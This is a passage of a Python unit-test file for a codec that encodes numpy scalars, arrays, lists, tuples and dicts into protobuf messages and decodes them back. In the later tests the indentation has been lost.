  self.assertEqual(codec.encode(np.uint8(251)), expected)

def test_decode_uint8_scalar(self):
  """Ensures that uint8s can be retrieved as np.uint8."""
  user_data = storage_pb2.Data()
  datum = user_data.datum
  datum.values.uint8_values = b'\xed'
  datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  self.assertTrue(
      np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
      f'Actual type: {type(decoded)}\n'
      f'user_data: {user_data}\n'
      f'decoded: {decoded}')
  self.assertIsInstance(decoded, np.uint8)
  self.assertEqual(decoded, np.uint8(237))

def test_identity_uint8_scalar_zero(self):
  """Encoding and decoding it back should not change its value."""
  decoded = codec.decode(codec.encode(np.uint8(0)))
  self.assertIsInstance(decoded, np.uint8)
  self.assertEqual(decoded, np.uint8(0))

def test_identity_uint8_scalar_positive(self):
  """Encoding and decoding it back should not change its value."""
  decoded = codec.decode(codec.encode(np.uint8(255)))
  self.assertIsInstance(decoded, np.uint8)
  self.assertEqual(decoded, np.uint8(255))
##############################################################################
# uint16
##############################################################################

def test_encode_uint16_scalar(self):
  """Ensures that an np.uint16 can be stored as bytes."""
  expected = storage_pb2.Data()
  datum = expected.datum
  datum.values.uint16_values = b'\x03\xe8'
  datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode(np.uint16(1000)), expected)

def test_decode_uint16_scalar(self):
  """Ensures that uint16s can be retrieved as np.uint16."""
  user_data = storage_pb2.Data()
  datum = user_data.datum
  datum.values.uint16_values = b'\x0b\xb8'
  datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  self.assertTrue(
      np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
      f'Actual type: {type(decoded)}\n'
      f'user_data: {user_data}\n'
      f'decoded: {decoded}')
  self.assertIsInstance(decoded, np.uint16)
  self.assertEqual(decoded, np.uint16(3000))

def test_identity_uint16_scalar_zero(self):
  """Encoding and decoding it back should not change its value."""
  decoded = codec.decode(codec.encode(np.uint16(0)))
  self.assertIsInstance(decoded, np.uint16)
  self.assertEqual(decoded, np.uint16(0))

def test_identity_uint16_scalar_positive(self):
  """Encoding and decoding it back should not change its value."""
  decoded = codec.decode(codec.encode(np.uint16(12345)))
  self.assertIsInstance(decoded, np.uint16)
  self.assertEqual(decoded, np.uint16(12345))
##############################################################################
#
# Array tests
#
##############################################################################

##############################################################################
# Empty and None values
##############################################################################

def test_encode_empty_list(self):
  """Tests that an empty Python list maps to an empty Data proto."""
  expected = storage_pb2.Data()
  self.assertEqual(codec.encode([]), expected)

def test_encode_none_list(self):
  """Tests that a Python list of one None element is represented by an Array."""
  expected = storage_pb2.Data()
  expected.array.values.add()
  self.assertEqual(codec.encode([None]), expected)

def test_encode_two_none_list(self):
  """Tests that a list of two None elements yields two empty Array values."""
  expected = storage_pb2.Data()
  expected.array.values.add()
  expected.array.values.add()
  self.assertEqual(codec.encode([None, None]), expected)

def test_encode_decode_empty_list(self):
  """Tests that an empty Python list becomes None when decoded."""
  # assertIsNone takes (obj, msg); the redundant `None` msg arg is dropped.
  self.assertIsNone(codec.decode(codec.encode([])))
##############################################################################
# float32
##############################################################################

def test_encode_float32_list(self):
  """Tests that a Python list of one element is represented by an Array."""
  want = storage_pb2.Data()
  elem = want.array.values.add().datum
  elem.values.float_values.append(np.float32(3.14))
  elem.shape.dim.add().size = -438
  self.assertEqual(codec.encode([np.float32(3.14)]), want)

def test_decode_float32_list(self):
  """Tests that we get a Python list from a proto Array."""
  user_data = storage_pb2.Data()
  elem = user_data.array.values.add().datum
  elem.values.float_values.append(np.float32(3.14))
  elem.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  self.assertNotEmpty(decoded)
  self.assertIsInstance(decoded[0], np.float32)
  self.assertListEqual(decoded, [np.float32(3.14)])

def test_encode_float32_nested_list(self):
  """Ensures that [[1.2, 3.4], [5.6, 7.8]] is represented correctly."""
  want = storage_pb2.Data()
  # Build the expected proto row by row; each scalar gets its own Datum.
  for row in ([1.2, 3.4], [5.6, 7.8]):
    inner = want.array.values.add().array
    for value in row:
      elem = inner.values.add().datum
      elem.values.float_values.append(np.float32(value))
      elem.shape.dim.add().size = -438
  self.assertEqual(
      codec.encode([[np.float32(1.2), np.float32(3.4)],
                    [np.float32(5.6), np.float32(7.8)]]), want)
##############################################################################
# float64
##############################################################################

def test_encode_float64_list(self):
  """Tests that a Python list of one element is represented by an Array."""
  want = storage_pb2.Data()
  elem = want.array.values.add().datum
  elem.values.double_values.append(np.float64(6.28))
  elem.shape.dim.add().size = -438
  self.assertEqual(codec.encode([np.float64(6.28)]), want)

def test_decode_float64_list(self):
  """Tests that we get a Python list from a proto Array."""
  user_data = storage_pb2.Data()
  elem = user_data.array.values.add().datum
  elem.values.double_values.append(np.float64(6.28))
  elem.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  self.assertNotEmpty(decoded)
  self.assertIsInstance(decoded[0], np.float64)
  self.assertListEqual(decoded, [np.float64(6.28)])
##############################################################################
# int32
##############################################################################

def test_encode_int32_list(self):
  """Tests that a Python list of one element is represented by an Array."""
  expected = storage_pb2.Data()
  datum = expected.array.values.add().datum
  datum.values.int32_values.append(np.int32(-12345))
  datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode([np.int32(-12345)]), expected)

def test_decode_int32_list(self):
  """Tests that we get a Python list from a proto Array."""
  user_data = storage_pb2.Data()
  datum = user_data.array.values.add().datum
  datum.values.int32_values.append(np.int32(-12345))
  datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  self.assertNotEmpty(decoded)
  self.assertIsInstance(decoded[0], np.int32)
  self.assertListEqual(decoded, [np.int32(-12345)])
##############################################################################
# int64
##############################################################################

def test_encode_int64_list(self):
  """Tests that a Python list of one element is represented by an Array."""
  expected = storage_pb2.Data()
  datum = expected.array.values.add().datum
  datum.values.int64_values.append(np.int64(-1234567890123456))
  datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode([np.int64(-1234567890123456)]), expected)

def test_decode_int64_list(self):
  """Tests that we get a Python list from a proto Array."""
  user_data = storage_pb2.Data()
  datum = user_data.array.values.add().datum
  datum.values.int64_values.append(np.int64(-1234567890123456))
  datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  self.assertNotEmpty(decoded)
  self.assertIsInstance(decoded[0], np.int64)
  self.assertListEqual(decoded, [np.int64(-1234567890123456)])

# Homogeneity.
def test_encode_heterogeneous_list(self):
  """Tests that an error is thrown for a list with different types."""
  user_data = [np.int64(-1234567890123456), np.int32(1)]
  self.assertRaises(TypeError, codec.encode, user_data)
##############################################################################
#
# ndarray tests
#
##############################################################################

def test_encode_one_float_elem_scalar_ndarray(self):
  """Ensures that np arrays with shape 0 can be encoded in our proto."""
  a = np.array(1.5, dtype=np.float32)
  expected = storage_pb2.Data()
  datum = expected.datum
  # float32 ndarrays are stored as a big-endian ('>f') byte buffer rather
  # than as a repeated float field.
  datum.values.float_values_buffer = a.astype('>f').tobytes()
  self.assertEqual(codec.encode(a), expected)

def test_encode_one_float_elem_ndarray(self):
  """Ensures that np float32 arrays can be encoded in our proto."""
  a = np.array([1.5], dtype=np.float32)
  expected = storage_pb2.Data()
  datum = expected.datum
  datum.shape.dim.add().size = 1
  datum.values.float_values_buffer = a.astype('>f').tobytes()
  self.assertEqual(codec.encode(a), expected)

def test_identity_one_float_elem_ndarray(self):
  """Ensures that np float32 arrays can be written and read back."""
  a = np.array(1.5, dtype=np.float32)
  np.testing.assert_equal(codec.decode(codec.encode(a)), a)

def test_decode_one_float_elem_ndarray(self):
  """Once encoded, the proto should be decodeable."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 1
  user_data.datum.values.float_values.append(0.1512)
  np.testing.assert_equal(
      codec.decode(user_data), np.array([0.1512], dtype=np.float32))

def test_decode_one_float_elem_ndarray_buffer(self):
  """Tests that we get a float32 ndarray back from a float32 buffer."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 1
  # float32 pi (~3.14159) as a big-endian byte array.
  user_data.datum.values.float_values_buffer = b'\x40\x49\x0f\xd0'
  decoded = codec.decode(user_data)
  self.assertEqual(decoded.dtype, np.float32)
  np.testing.assert_equal(decoded, np.array([3.14159], dtype=np.float32))
def test_encode_one_double_elem_scalar_ndarray(self):
  """Ensures that np arrays with shape 0 can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.values.double_values.append(512.123)
  self.assertEqual(
      codec.encode(np.array(512.123, dtype=np.float64)), want)

def test_encode_one_double_elem_ndarray(self):
  """Ensures that np float64 arrays can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.shape.dim.add().size = 1
  want.datum.values.double_values.append(512.123)
  self.assertEqual(
      codec.encode(np.array([512.123], dtype=np.float64)), want)

def test_decode_one_double_elem_ndarray(self):
  """Once encoded, the proto should be decodeable."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 1
  user_data.datum.values.double_values.append(0.63661)
  np.testing.assert_equal(
      codec.decode(user_data), np.array([0.63661], dtype=np.float64))

def test_encode_multiple_double_elem_ndarray(self):
  """Ensures that np float64 multi-element arrays can be encoded."""
  want = storage_pb2.Data()
  want.datum.shape.dim.add().size = 2
  want.datum.values.double_values.extend([987.654, 321.098])
  self.assertEqual(codec.encode(np.array([987.654, 321.098])), want)

def test_decode_multiple_double_elem_ndarray(self):
  """Once encoded, the proto should be decodeable."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 3
  user_data.datum.values.double_values.extend([0.74048, 2.09455, 0.69314])
  np.testing.assert_equal(
      codec.decode(user_data),
      np.array([0.74048, 2.09455, 0.69314], dtype=np.float64))
def test_encode_one_int32_elem_scalar_ndarray(self):
  """Ensures that np arrays with shape 0 can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.values.int32_values.append(415)
  self.assertEqual(codec.encode(np.array(415, dtype=np.int32)), want)

def test_encode_one_int32_elem_ndarray(self):
  """Ensures that np int32 arrays can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.shape.dim.add().size = 1
  want.datum.values.int32_values.append(415)
  self.assertEqual(codec.encode(np.array([415], dtype=np.int32)), want)

def test_decode_one_int32_elem_ndarray(self):
  """Once encoded, the proto should be decodeable."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 1
  user_data.datum.values.int32_values.append(9)
  np.testing.assert_equal(
      codec.decode(user_data), np.array([9], dtype=np.int32))
def test_encode_one_int64_elem_scalar_ndarray(self):
  """Ensures that np arrays with shape 0 can be encoded in our proto."""
  expected = storage_pb2.Data()
  datum = expected.datum
  datum.values.int64_values.append(415)
  self.assertEqual(codec.encode(np.array(415, dtype=np.int64)), expected)

def test_encode_one_int64_elem_ndarray(self):
  """Ensures that np int64 arrays can be encoded in our proto."""
  expected = storage_pb2.Data()
  datum = expected.datum
  datum.shape.dim.add().size = 1
  datum.values.int64_values.append(415)
  # dtype is pinned explicitly: bare np.array([415]) defaults to a C long,
  # which is int32 on some platforms (e.g. Windows) and would flake there.
  self.assertEqual(codec.encode(np.array([415], dtype=np.int64)), expected)

def test_encode_multiple_int64_elem_ndarray(self):
  """Ensures that np int64 multi-element arrays can be encoded."""
  expected = storage_pb2.Data()
  datum = expected.datum
  datum.shape.dim.add().size = 2
  datum.values.int64_values.extend([123, 456])
  # Explicit dtype for the same platform-independence reason as above.
  self.assertEqual(
      codec.encode(np.array([123, 456], dtype=np.int64)), expected)

def test_decode_one_int64_elem_ndarray(self):
  """Once encoded, the proto should be decodeable."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 1
  user_data.datum.values.int64_values.append(9)
  np.testing.assert_equal(
      codec.decode(user_data), np.array([9], dtype=np.int64))

def test_decode_multiple_int64_elem_ndarray(self):
  """Once encoded, the proto should be decodeable."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 3
  user_data.datum.shape.dim.add().size = 2
  user_data.datum.values.int64_values.extend([6, 5, 4, 3, 2, 1])
  np.testing.assert_equal(
      codec.decode(user_data),
      np.array([[6, 5], [4, 3], [2, 1]], dtype=np.int64))
def test_encode_one_uint32_elem_scalar_ndarray(self):
  """Ensures that np arrays with shape 0 can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.values.uint32_values.append(415)
  self.assertEqual(codec.encode(np.array(415, dtype=np.uint32)), want)

def test_encode_one_uint32_elem_ndarray(self):
  """Ensures that np uint32 arrays can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.shape.dim.add().size = 1
  want.datum.values.uint32_values.append(415)
  self.assertEqual(codec.encode(np.array([415], dtype=np.uint32)), want)

def test_decode_one_uint32_elem_ndarray(self):
  """Once encoded, the proto should be decodeable."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 1
  user_data.datum.values.uint32_values.append(9)
  np.testing.assert_equal(
      codec.decode(user_data), np.array([9], dtype=np.uint32))
def test_encode_one_uint64_elem_scalar_ndarray(self):
  """Ensures that np arrays with shape 0 can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.values.uint64_values.append(415)
  self.assertEqual(codec.encode(np.array(415, dtype=np.uint64)), want)

def test_encode_one_uint64_elem_ndarray(self):
  """Ensures that np uint64 arrays can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.shape.dim.add().size = 1
  want.datum.values.uint64_values.append(415)
  self.assertEqual(codec.encode(np.array([415], dtype=np.uint64)), want)

def test_decode_one_uint64_elem_ndarray(self):
  """Once encoded, the proto should be decodeable."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 1
  user_data.datum.values.uint64_values.append(9)
  np.testing.assert_equal(
      codec.decode(user_data), np.array([9], dtype=np.uint64))
def test_encode_one_bool_elem_scalar_ndarray(self):
  """Ensures that np arrays with shape 0 can be encoded in our proto."""
  expected = storage_pb2.Data()
  datum = expected.datum
  datum.values.bool_values.append(True)
  # `np.bool` (an alias for the builtin bool) was removed in NumPy 1.24;
  # the builtin `bool` is the supported spelling for a boolean dtype.
  self.assertEqual(codec.encode(np.array(True, dtype=bool)), expected)

def test_encode_one_bool_elem_ndarray(self):
  """Ensures that np bool arrays can be encoded in our proto."""
  expected = storage_pb2.Data()
  datum = expected.datum
  datum.shape.dim.add().size = 1
  datum.values.bool_values.append(True)
  self.assertEqual(codec.encode(np.array([True], dtype=bool)), expected)

def test_decode_one_bool_elem_ndarray(self):
  """Once encoded, the proto should be decodeable."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 1
  user_data.datum.values.bool_values.append(True)
  np.testing.assert_equal(
      codec.decode(user_data), np.array([True], dtype=bool))
def test_encode_one_string_elem_scalar_ndarray(self):
  """Ensures that np arrays with shape 0 can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.values.string_values.append('dream theater')
  self.assertEqual(codec.encode(np.array('dream theater')), want)

def test_encode_one_string_elem_ndarray(self):
  """Ensures that np string arrays can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.shape.dim.add().size = 1
  want.datum.values.string_values.append('rachmaninov')
  self.assertEqual(codec.encode(np.array(['rachmaninov'])), want)

def test_decode_one_string_elem_ndarray(self):
  """Once encoded, the proto should be decodeable."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 1
  user_data.datum.values.string_values.append('scriabin')
  np.testing.assert_equal(codec.decode(user_data), np.array(['scriabin']))
def test_encode_one_bytes_elem_scalar_ndarray(self):
  """Ensures that np arrays with shape 0 can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.values.bytes_values.append(b'a1b2c3d4e5f6')
  self.assertEqual(codec.encode(np.array(b'a1b2c3d4e5f6')), want)

def test_encode_one_bytes_elem_ndarray(self):
  """Ensures that np bytes arrays can be encoded in our proto."""
  want = storage_pb2.Data()
  want.datum.shape.dim.add().size = 1
  want.datum.values.bytes_values.append(b'a1b2c3d4e5f6')
  self.assertEqual(codec.encode(np.array([b'a1b2c3d4e5f6'])), want)

def test_decode_one_bytes_elem_ndarray(self):
  """Once encoded, the proto should be decodeable."""
  user_data = storage_pb2.Data()
  user_data.datum.shape.dim.add().size = 1
  user_data.datum.values.bytes_values.append(b'6f5e4d3c2b1a')
  np.testing.assert_equal(
      codec.decode(user_data), np.array([b'6f5e4d3c2b1a']))
def test_encode_one_int_elem_scalar_ndarray(self):
"""Ensures that ndarrays with dtype==object raise an error."""
self.assertRaises(TypeError, codec.encode,
np.array(12345678901234567890, dtype=object))
def test_decode_one_int_elem_ndarray(self):
"""Ensures that non-scalar Datums with dtype==object raise an error."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.bigint_values.append(
b'\000\253T\251\214\353\037\n\322')
self.assertRaises(TypeError, codec.decode, user_data)
def test_encode_one_int8_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.int8_values = b'\x85'
self.assertEqual(codec.encode(np.array(-123, dtype=np.int8)), expected)
def test_encode_one_int8_elem_ndarray(self):
"""Ensures that np int8 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.int8_values = b'\x85'
self.assertEqual(codec.encode(np.array([-123], dtype=np.int8)), expected)
def test_encode_two_int8_elem_ndarray(self):
"""Ensures that np int8 2-element arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.values.int8_values = b'\x85\x84'
self.assertEqual(
codec.encode(np.array([-123, -124], dtype=np.int8)), expected)
def test_decode_one_int8_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.int8_values = b'\x91'
decoded = codec.decode(user_data)
self.assertEqual(decoded.dtype, np.int8)
np.testing.assert_equal(decoded, np.array([-111], dtype=np.int8))
def test_decode_two_int8_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 2
user_data.datum.values.int8_values = b'\xa1\xb2'
np.testing.assert_equal(
codec.decode(user_data), np.array([-95, -78], dtype=np.int8))
def test_encode_one_int16_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.int16_values = b'\xfe\xa7'
self.assertEqual(codec.encode(np.array(-345, dtype=np.int16)), expected)
def test_encode_one_int16_elem_ndarray(self):
"""Ensures that np int16 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.int16_values = b'\xfe\xa7'
self.assertEqual(codec.encode(np.array([-345], dtype=np.int16)), expected)
def test_encode_two_int16_elem_ndarray(self):
"""Ensures that np int16 2-element arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.values.int16_values = b'\xfe\xa7\xfe\xa6'
self.assertEqual(
codec.encode(np.array([-345, -346], dtype=np.int16)), expected)
def test_decode_one_int16_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.int16_values = b'\xfe\xa7'
decoded = codec.decode(user_data)
self.assertEqual(decoded.dtype, np.int16)
np.testing.assert_equal(decoded, np.array([-345], dtype=np.int16))
def test_decode_two_int16_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 2
user_data.datum.values.int16_values = b'\xa1\xb2\xc3\xd4'
np.testing.assert_equal(
codec.decode(user_data), np.array([-24142, -15404], dtype=np.int16))
def test_encode_one_uint8_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.uint8_values = b'\x7b'
self.assertEqual(codec.encode(np.array(123, dtype=np.uint8)), expected)
def test_encode_one_uint8_elem_ndarray(self):
"""Ensures that np uint8 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.uint8_values = b'\x7b'
self.assertEqual(codec.encode(np.array([123], dtype=np.uint8)), expected)
def test_encode_two_uint8_elem_ndarray(self):
"""Ensures that np uint8 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.values.uint8_values = b'\x7b\x7a'
self.assertEqual(
codec.encode(np.array([123, 122], dtype=np.uint8)), expected)
def test_decode_one_uint8_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.uint8_values = b'\xa1'
np.testing.assert_equal(
codec.decode(user_data), np.array([161], dtype=np.uint8))
def test_decode_two_uint8_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 2
user_data.datum.values.uint8_values = b'\xa1\xb2'
np.testing.assert_equal(
codec.decode(user_data), np.array([161, 178], dtype=np.uint8))
def test_encode_one_uint16_elem_scalar_ndarray(self):
"""Ensures that np arrays with shape 0 can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.uint16_values = b'\x01Y'
self.assertEqual(codec.encode(np.array(345, dtype=np.uint16)), expected)
def test_encode_one_uint16_elem_ndarray(self):
"""Ensures that np uint16 arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 1
datum.values.uint16_values = b'\x01Y'
self.assertEqual(codec.encode(np.array([345], dtype=np.uint16)), expected)
def test_encode_two_uint16_elem_ndarray(self):
"""Ensures that np uint16 2-element arrays can be encoded in our proto."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.values.uint16_values = b'\x01Y\x01X'
self.assertEqual(
codec.encode(np.array([345, 344], dtype=np.uint16)), expected)
def test_decode_one_uint16_elem_ndarray(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 1
user_data.datum.values.uint16_values = b'\xa1\xb2'
np.testing.assert_equal(
codec.decode(user_data), np.array([41394], dtype=np.uint16))
def test_decode_two_uint16_elem_ndarray(self):
user_data = storage_pb2.Data()
user_data.datum.shape.dim.add().size = 2
user_data.datum.values.uint16_values = b'\xa1\xb2\xc3\xd4'
np.testing.assert_equal(
codec.decode(user_data), np.array([41394, 50132], dtype=np.uint16))
# Multi-dimensional arrays.
def test_encode_2d_int64_elem_ndarray(self):
"""A 2D np int64 array should also be reprentable."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 2
datum.shape.dim.add().size = 3
datum.values.int64_values.extend([1, 3, 5, 7, 9, 11])
self.assertEqual(codec.encode(np.array([[1, 3, 5], [7, 9, 11]])), expected)
def test_encode_2d_double_elem_ndarray(self):
"""A 2D np float64 array should also be reprentable."""
expected = storage_pb2.Data()
datum = expected.datum
datum.shape.dim.add().size = 3
datum.shape.dim.add().size = 2
datum.values.double_values.extend([10.0, 8.0, 6.0, 4.0, 2.0, 0.0])
self.assertEqual(
codec.encode(np.array([[10.0, 8.0], [6.0, 4.0], [2.0, 0.0]])), expected)
##############################################################################
#
# Array of np arrays tests
#
##############################################################################
# float64
def test_encode_one_double_elem_ndarray_list(self):
"""A list of one np float64 array should be representable."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.shape.dim.add().size = 1
datum.values.double_values.append(3.14)
self.assertEqual(codec.encode([np.array([3.14])]), expected)
def test_encode_multiple_double_elem_ndarray_list(self):
"""A list of one multidimensional np int64 array should be representable."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.shape.dim.add().size = 5
datum.values.double_values.extend([0.0, 0.25, 0.5, 0.75, 1.0])
self.assertEqual(
codec.encode([np.array([0.0, 0.25, 0.5, 0.75, 1.0])]), expected)
def test_decode_double_elem_ndarray_list(self):
user_data = storage_pb2.Data()
datum1 = user_data.array.values.add().datum
datum1.shape.dim.add().size = 1
datum1.values.double_values.append(1.2345)
datum2 = user_data.array.values.add().datum
datum2.shape.dim.add().size = 2
datum2.values.double_values.extend([4.567, 8.9011])
datum3 = user_data.array.values.add().datum
datum3.shape.dim.add().size = 3
datum3.shape.dim.add().size = 1
datum3.values.double_values.extend([9.8765, 4.321, -0.12345])
decoded = codec.decode(user_data)
self.assertLen(decoded, 3)
self.assertIsInstance(decoded, list)
np.testing.assert_equal(decoded[0], np.array([1.2345], dtype=np.float64))
np.testing.assert_equal(decoded[1],
np.array([4.567, 8.9011], dtype=np.float64))
np.testing.assert_equal(
decoded[2], np.array([[9.8765], [4.321], [-0.12345]], dtype=np.float64))
# int64
def test_encode_one_int64_elem_ndarray_list(self):
"""A list of one np int64 array should be representable."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.shape.dim.add().size = 1
datum.values.int64_values.append(719)
self.assertEqual(codec.encode([np.array([719])]), expected)
def test_encode_multiple_int64_elem_ndarray_list(self):
"""A list of one multidimensional np int64 array should be representable."""
expected = storage_pb2.Data()
datum = expected.array.values.add().datum
datum.shape.dim.add().size = 5
datum.values.int64_values.extend([1, 1, 2, 3, 5])
self.assertEqual(codec.encode([np.array([1, 1, 2, 3, 5])]), expected)
def test_decode_int64_elem_ndarray_list(self):
user_data = storage_pb2.Data()
datum1 = user_data.array.values.add().datum
datum1.shape.dim.add().size = 1
datum1.values.int64_values.append(1000)
datum2 = user_data.array.values.add().datum
datum2.shape.dim.add().size = 2
datum2.values.int64_values.extend([2000, 3000])
datum3 = user_data.array.values.add().datum
datum3.shape.dim.add().size = 3
datum3.shape.dim.add().size = 1
datum3.values.int64_values.extend([4000, 5000, 6000])
decoded = codec.decode(user_data)
self.assertLen(decoded, 3)
self.assertIsInstance(decoded, list)
np.testing.assert_equal(decoded[0], np.array([1000], dtype=np.int64))
np.testing.assert_equal(decoded[1], np.array([2000, 3000], dtype=np.int64))
np.testing.assert_equal(decoded[2],
np.array([[4000], [5000], [6000]], dtype=np.int64))
##############################################################################
#
# Tuple tests
#
##############################################################################
def test_encode_one_double_elem_ndarray_tuple(self):
"""Tuples of np float64 arrays should be representable."""
expected = storage_pb2.Data()
datum = expected.tuple.values.add().datum
datum.shape.dim.add().size = 1
datum.values.double_values.append(-1 / 12)
self.assertEqual(codec.encode((np.array([-1 / 12]),)), expected)
def test_encode_multiple_double_elem_ndarray_tuple(self):
"""Tuples of np float64 arrays should be representable."""
expected = storage_pb2.Data()
datum = expected.tuple.values.add().datum
datum.shape.dim.add().size = 2
datum.values.double_values.extend([6.28, 2.71828])
self.assertEqual(codec.encode((np.array([6.28, 2.71828]),)), expected)
def test_decode_double_elem_ndarray_tuple(self):
"""Once encoded, the proto should be decodeable."""
user_data = storage_pb2.Data()
datum1 = user_data.tuple.values.add().datum
datum1.shape.dim.add().size = 1
datum1.values.double_values.append(1.2345)
datum2 = user_data.tuple.values.add().datum
datum2.shape.dim.add().size = 2
datum2.values.double_values.extend([4.567, 8.9011])
datum3 = user_data.tuple.values.add().datum
datum3.shape.dim.add().size = 3
datum3.shape.dim.add().size = 1
datum3.values.double_values.extend([9.8765, 4.321, -0.12345])
decoded = codec.decode(user_data)
self.assertLen(decoded, 3)
self.assertIsInstance(decoded, tuple)
np.testing.assert_equal(decoded[0], np.array([1.2345], dtype=np.float64))
np.testing.assert_equal(decoded[1],
np.array([4.567, 8.9011], dtype=np.float64))
np.testing.assert_equal(
decoded[2], np.array([[9.8765], [4.321], [-0.12345]], dtype=np.float64))
def test_encode_one_int64_elem_ndarray_tuple(self):
"""Tuples of np int64 arrays should be representable."""
expected = storage_pb2.Data()
datum = expected.tuple.values.add().datum
datum.shape.dim.add().size = 1
datum.values.int64_values.append(1729)
self.assertEqual(codec.encode((np.array([1729]),)), expected)
def test_encode_multiple_int64_elem_ndarray_tuple(self):
"""Tuples of np int64 arrays should be representable."""
expected = storage_pb2.Data()
datum = expected.tuple.values.add().datum
datum.shape.dim.add().size = 6
datum.values.int64_values.extend([2, 3, 5, 7, 9, 11])
self.assertEqual(codec.encode((np.array([2, 3, 5, 7, 9, 11]),)), expected)
def test_decode_int64_elem_ndarray_tuple(self):
user_data = storage_pb2.Data()
datum1 = user_data.tuple.values.add().datum
datum1.shape.dim.add().size = 1
datum1.values.int64_values.append(1000)
datum2 = user_data.tuple.values.add().datum
datum2.shape.dim.add().size = 2
datum2.values.int64_values.extend([2000, 3000])
datum3 = user_data.tuple.values.add().datum
datum3.shape.dim.add().size = 3
datum3.shape.dim.add().size = 1
datum3.values.int64_values.extend([4000, 5000, 6000])
decoded = codec.decode(user_data)
self.assertLen(decoded, 3)
self.assertIsInstance(decoded, tuple)
np.testing.assert_equal(decoded[0], np.array([1000], dtype=np.int64))
np.testing.assert_equal(decoded[1], np.array([2000, 3000], dtype=np.int64))
np.testing.assert_equal(decoded[2],
np.array([[4000], [5000], [6000]], dtype=np.int64))
##############################################################################
#
# Dict tests
#
##############################################################################
def test_encode_int64_elem_ndarray_dict(self):
"""Dict of int64 and of other dicts."""
expected = storage_pb2.Data()
d = expected.dict.values
datum1 = d['good'].datum
datum1.shape.dim.add().size = 1
datum1.values.int64_values.append(1)
datum2 = d['bad'].datum
datum2.shape.dim.add().size = 1
datum2.values.int64_values.append(-1)
# Dict also supports nested dicts.
datum3 = d['nested_dict'].dict.values['cumulants'].datum
datum3.shape.dim.add().size = 2
datum3.values.int64_values.extend([1000, -2])
self.assertEqual(
codec.encode({
'good': np.array([1]),
'bad': np.array([-1]),
'nested_dict': {
'cumulants': np.array([1000, -2])
}
}), expected)
def test_encode_double_elem_ndarray_dict(self):
